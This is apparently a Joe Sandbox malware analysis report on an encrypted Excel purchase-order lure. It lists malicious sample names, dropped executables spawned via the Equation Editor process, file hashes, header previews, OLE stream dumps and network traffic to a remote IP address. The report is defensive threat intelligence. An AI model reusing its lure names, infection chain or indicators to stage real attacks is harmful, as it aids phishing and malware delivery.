Joe Sandbox View:	Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse Filename: 3arZKnr21W.exe, Detection: malicious, Browse Filename: Shipping receipt.exe, Detection: malicious, Browse Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse Filename: YZ8OvkljWm.exe, Detection: malicious, Browse Filename: U03c2doc.exe, Detection: malicious, Browse Filename: QUOTE061021.exe, Detection: malicious, Browse Filename: PAYMENT CONFIRMATION.exe, Detection: malicious, Browse Filename: PO187439.exe, Detection: malicious, Browse Filename: 090009000000090.exe, Detection: malicious, Browse Filename: NEWORDERLIST.exe, Detection: malicious, Browse Filename: 00404000004.exe, Detection: malicious, Browse Filename: 40900900090000.exe, Detection: malicious, Browse Filename: INVO090090202.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe, Detection: malicious, Browse Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Bulz.383129.23206.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsu1B7.tmp Download File
Process:	C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
File Type:	data
Category:	dropped
Size (bytes):	709852
Entropy (8bit):	7.87001429899952
Encrypted:	false
SSDEEP:	12288:4Ph/JQuO9xgeB2Q54fr2dM4av0CGBmhFoqS3UDmhcOQV5eZTB6oI5BN:cdiuMxgy6frQuv0L0hFoqSkDmhcOsS98
MD5:	AEF5690996B3714098A9E0B69D9E5828
SHA1:	24B935683ECD3F3AF9F9EFE2620D6D05EFFED89C
SHA-256:	DBAADCC0481847BAB4237EDCF2F4990A047D5821BDFE186931103EAF17250101
SHA-512:	1F4A7C2FBD9553F7771B30CB907F7BAF3F4CF89450D9A79272250BA986CF92A249BE5E79827D332F709CEA8229EF37043F4236C626FDB82150EFD7AFE4D9DBED
Malicious:	false
Preview:	.S......,.......................T=.......S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsu1B8.tmp\System.dll Download File
Process:	C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:/J8t:B8
MD5:	E7754743CCCD290996FCD3E5B6426D5A
SHA1:	01EFA7ACEDE9037AFCEC6B2038532271AF4C8957
SHA-256:	8F952ED33B03F7939786FF0D0FFF0BB30CC754C48F6E6A34C1EA2783D05F3586
SHA-512:	CA1E9A5E43E95A6F18BCB4F228D97BC6937859F27918286F737D749AC28A48A425BBA01F6CB42F8A5B24C4A1930C7DBC41929E87D3853CFE8BD8E55DA8D53A55
Malicious:	true
Preview:	.@Kg[,.H

C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	682684
Entropy (8bit):	7.985587248644902
Encrypted:	false
SSDEEP:	12288:y4Bwh6Ga/zhQmHMbNdSsTIDy5dX5Z6fdBUd+YiUjBumJBP4/MW:y4B/Ga/zhQ0MhTUCdX5Z6fd24YZjkmJy
MD5:	3DEB8B7E51C21CBA0C2C723C5AF953DD
SHA1:	F98809B1B883912D278F7EAF64D7EEDFAEE1EF5A
SHA-256:	C0503F7C65391A5BE8030BBAAF6C17260FA67E40A3FCC23B84C26610C266008B
SHA-512:	27B12686A9979FD2107806B3C923F5E616FEA6F9DBFA0DBC1516FEE88C330B3DD81C82794E20F085FDF324E1EA4EFF9B4A942E55FB19F13CE1DBE24074E76A94
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 35%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Purchase Order Price List 061021.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	682684
Entropy (8bit):	7.985587248644902
Encrypted:	false
SSDEEP:	12288:y4Bwh6Ga/zhQmHMbNdSsTIDy5dX5Z6fdBUd+YiUjBumJBP4/MW:y4B/Ga/zhQ0MhTUCdX5Z6fd24YZjkmJy
MD5:	3DEB8B7E51C21CBA0C2C723C5AF953DD
SHA1:	F98809B1B883912D278F7EAF64D7EEDFAEE1EF5A
SHA-256:	C0503F7C65391A5BE8030BBAAF6C17260FA67E40A3FCC23B84C26610C266008B
SHA-512:	27B12686A9979FD2107806B3C923F5E616FEA6F9DBFA0DBC1516FEE88C330B3DD81C82794E20F085FDF324E1EA4EFF9B4A942E55FB19F13CE1DBE24074E76A94
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 35%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.995379514501691
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Purchase Order Price List 061021.xlsx
File size:	1253640
MD5:	9293317a587ed5636aa0863c1c1fc802
SHA1:	718896b0b8a47c9f1a15a62821cb4bee059f1ae6
SHA256:	1cbd45f0443190de9628a94ccd12cd93ec068ff3ad78fc058824de7370ab2af4
SHA512:	fecd55bea9cb40343a15c8e86571271655105369952369dd4140125dcfaab1c559b7f214e8143fd69f954c34b4eac68300c9c9b5c72c3646c21e528703c5375c
SSDEEP:	24576:fZUv0NP7rLSpF3XtbqlyoG4wR32oSP7nqAvXMm3:xUv6jrLSpF3X9m3G4umoSP7qAv5
File Content Preview:	........................>...............................................................................................................z.......y.......}......................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Purchase Order Price List 061021.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	208
Entropy:	3.35153409046
Base64 Encoded:	False
Data ASCII:	l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
Data Raw:	6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1239816

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1239816
Entropy:	7.99980864717
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . ( . . . . / . . . . B . c . . . . . . . . . . + . ` . . . . _ P c / . . . i . . . A . . . . . . . . 2 . . . . . f . . . ; ' . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c . . , { L % . . . f . . . . F c
Data Raw:	fd ea 12 00 00 00 00 00 ad 28 ec 93 b1 e7 2f fd 80 98 e7 42 8b 63 f1 0a 1d 08 95 f6 12 07 10 c6 2b 83 60 94 02 1f 0c 5f 50 63 2f 06 89 bb 69 ba 13 a3 41 da 12 a3 bb 09 8e 8c a9 32 15 c8 18 c9 99 66 de ab 15 3b 27 1d 08 66 8c 94 0b 1b 46 63 b8 99 2c 7b 4c 25 d1 c9 08 66 8c 94 0b 1b 46 63 b8 99 2c 7b 4c 25 d1 c9 08 66 8c 94 0b 1b 46 63 b8 99 2c 7b 4c 25 d1 c9 08 66 8c 94 0b 1b 46 63

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.61037851466
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . g . . ^ 8 . . . 1 . O . . e q r . . w w x ~ . ! z . 1 & . . . . . . . c ^ } . B . z c . 7 . . . . . . . . X . . " v . . . S . . . .
Data Raw:	03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 a0 82 a3 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 15:02:33.784425020 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:33.924866915 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:33.924997091 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:33.925414085 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.067766905 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.067831039 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.067883968 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.067934036 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.067940950 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.067965031 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.067976952 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.067992926 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.067996979 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.068053961 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.068057060 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.068105936 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.068111897 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.068156958 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.068164110 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.068206072 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.068213940 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.068257093 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.068263054 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.068315029 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.080410957 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208530903 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208559990 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208585978 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208590031 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208601952 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208611965 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208617926 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208647966 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208655119 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208676100 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208686113 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208703995 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208709955 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208739042 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208772898 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208800077 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208810091 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208831072 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208842993 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208862066 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208863974 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208888054 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208914042 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208914995 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208923101 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208940983 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208950996 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.208967924 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.208987951 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.209007978 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.209028006 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.209033012 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.209050894 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.209053040 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.209060907 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.209079981 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.209084988 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.209110022 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.210611105 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351090908 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351161957 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351166964 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351193905 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351206064 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351228952 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351233006 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351265907 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351269007 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351305962 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351306915 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351346016 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351346016 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351386070 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351387978 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351430893 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351437092 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351479053 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351480961 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351521015 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351521969 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351557970 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351564884 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351603985 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351607084 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351644993 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351649046 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351690054 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351691008 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351727962 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351733923 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351769924 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351778984 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351819992 CEST	49165	80	192.168.2.22	198.12.127.155
Jun 10, 2021 15:02:34.351823092 CEST	80	49165	198.12.127.155	192.168.2.22
Jun 10, 2021 15:02:34.351861954 CEST	49165	80	192.168.2.22	198.12.127.155

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 15:02:45.234879017 CEST	52197	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:02:45.298507929 CEST	53	52197	8.8.8.8	192.168.2.22
Jun 10, 2021 15:02:50.603744030 CEST	53099	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:02:50.662861109 CEST	53	53099	8.8.8.8	192.168.2.22
Jun 10, 2021 15:02:50.679866076 CEST	53099	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:02:50.740917921 CEST	53	53099	8.8.8.8	192.168.2.22
Jun 10, 2021 15:02:56.200974941 CEST	52838	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:02:56.260792017 CEST	53	52838	8.8.8.8	192.168.2.22
Jun 10, 2021 15:02:56.261648893 CEST	52838	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:02:56.321379900 CEST	53	52838	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:01.584630966 CEST	61200	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:01.647211075 CEST	53	61200	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:01.719466925 CEST	49548	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:01.778382063 CEST	53	49548	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:01.795335054 CEST	55627	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:01.858169079 CEST	53	55627	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:01.858848095 CEST	55627	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:01.917936087 CEST	53	55627	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:01.918698072 CEST	55627	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:01.977811098 CEST	53	55627	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:06.126239061 CEST	56009	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:06.186060905 CEST	53	56009	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:06.221081972 CEST	61865	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:06.285440922 CEST	53	61865	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:06.285887003 CEST	61865	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:06.348084927 CEST	53	61865	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:06.348807096 CEST	61865	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:06.408916950 CEST	53	61865	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:06.465986967 CEST	55171	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:06.524967909 CEST	53	55171	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:10.559783936 CEST	52496	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:10.610069990 CEST	53	52496	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:10.667665958 CEST	57564	53	192.168.2.22	8.8.4.4
Jun 10, 2021 15:03:10.726418972 CEST	53	57564	8.8.4.4	192.168.2.22
Jun 10, 2021 15:03:10.735869884 CEST	63009	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:10.795206070 CEST	53	63009	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:14.851315975 CEST	59319	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:14.910526991 CEST	53	59319	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:14.911602020 CEST	59319	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:14.964814901 CEST	53	59319	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:20.203521013 CEST	53070	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:20.256688118 CEST	53	53070	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:25.456655979 CEST	59770	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:25.516088009 CEST	53	59770	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:30.796261072 CEST	61523	53	192.168.2.22	8.8.8.8
Jun 10, 2021 15:03:30.857871056 CEST	53	61523	8.8.8.8	192.168.2.22
Jun 10, 2021 15:03:30.938335896 CEST	62791	53	192.168.2.22	8.8.4.4
